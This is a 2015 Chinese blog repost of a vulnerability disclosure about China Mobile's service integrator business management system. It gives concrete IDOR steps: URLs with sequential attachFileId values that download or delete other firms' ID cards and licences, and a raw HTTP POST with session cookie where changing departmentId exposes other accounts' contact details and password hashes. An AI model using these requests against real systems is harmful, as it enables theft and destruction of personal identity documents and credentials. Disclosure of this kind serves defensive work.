IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
  • 登录 注册

    中国移动服务集成商业务管理系统可越权读取他人帐号信息/下载或删除大量证件信息

    神刀发表于 2015-07-20 22:41:29
    love 0

    http://si.power.10086.cn/si/portal/login.jsp 任何人都可以注册帐号。

    【下载或删除大量证件信息】

    登录后点击"资质合作"-"合作办理"-"新增资质合作",上传一个文件。

    中国移动服务集成商业务管理系统可越权读取他人帐号信息/下载或删除大量证件信息



    中国移动服务集成商业务管理系统可越权读取他人帐号信息/下载或删除大量证件信息



    得到如下链接:

    code 区域
    http://si.power.10086.cn/server/spreq/attachment!download.action?attachFileId=801100014391&ticket=46F7E46EEC319B9598DCB64194B3E05C&domain=si



    修改其中的attachFileId参数,即可下载他人附件。(这是一个公差为1的等差数列 ._.

    http://si.power.10086.cn/server/spreq/attachment!download.action?attachFileId=801100010000 “法人身份证.rar”

    http://si.power.10086.cn/server/spreq/attachment!download.action?attachFileId=801100010001 “开户许可证(广安门).rar”

    http://si.power.10086.cn/server/spreq/attachment!download.action?attachFileId=801100010002 “税务登记证.rar”

    ...

    http://si.power.10086.cn/server/spreq/attachment!download.action?attachFileId=801100010888 “法人身份证.jpg”

    等...

    我们点击删除:

    中国移动服务集成商业务管理系统可越权读取他人帐号信息/下载或删除大量证件信息



    中国移动服务集成商业务管理系统可越权读取他人帐号信息/下载或删除大量证件信息



    修改这里的attachFileId就可以删除他人的文件,这里就不截图了,删太多不好 ._.



    【越权读取他人帐号信息】

    点击"系统管理" - "修改个人资料"

    中国移动服务集成商业务管理系统可越权读取他人帐号信息/下载或删除大量证件信息



    code 区域
    POST /server/auth/findDepartment.action HTTP/1.1
    Host: si.power.10086.cn
    Proxy-Connection: keep-alive
    Content-Length: 81
    Origin: http://si.power.10086.cn
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://si.power.10086.cn/si/auth/individual/modifyInfo.jsp
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: WT_FPC=id=25519224df114d4083e1432127697326:lv=1432127697326:ss=1432127697326; JSESSIONID=46F7E46EEC319B9598DCB64194B3E05C

    department.departmentId=1015441&ticket=46F7E46EEC319B9598DCB64194B3E05C&domain=si



    修改department.departmentId即可越权查看他人帐号信息,包括公司名、手机号、邮箱、登录ID和并不知道加密方式的密码 ._.

    中国移动服务集成商业务管理系统可越权读取他人帐号信息/下载或删除大量证件信息



    中国移动服务集成商业务管理系统可越权读取他人帐号信息/下载或删除大量证件信息





    顺手补张图

    中国移动服务集成商业务管理系统可越权读取他人帐号信息/下载或删除大量证件信息

    漏洞证明:

    如上。

    您可能也喜欢:

    中国移动某信息管理系统(中央)某处信息泄漏大量合作伙伴躺枪

    中国电信某IDC机房信息安全管理系统设计缺陷致使系统沦陷

    中国移动12580酒店管理系统Stru命令执行!

    中国福利彩票某管理系统未授权访问 敏感信息泄漏

    夏普中国经销商后台管理系统敏感信息泄露(已被入侵多次)
    无觅


沪ICP备19023445号-2号
友情链接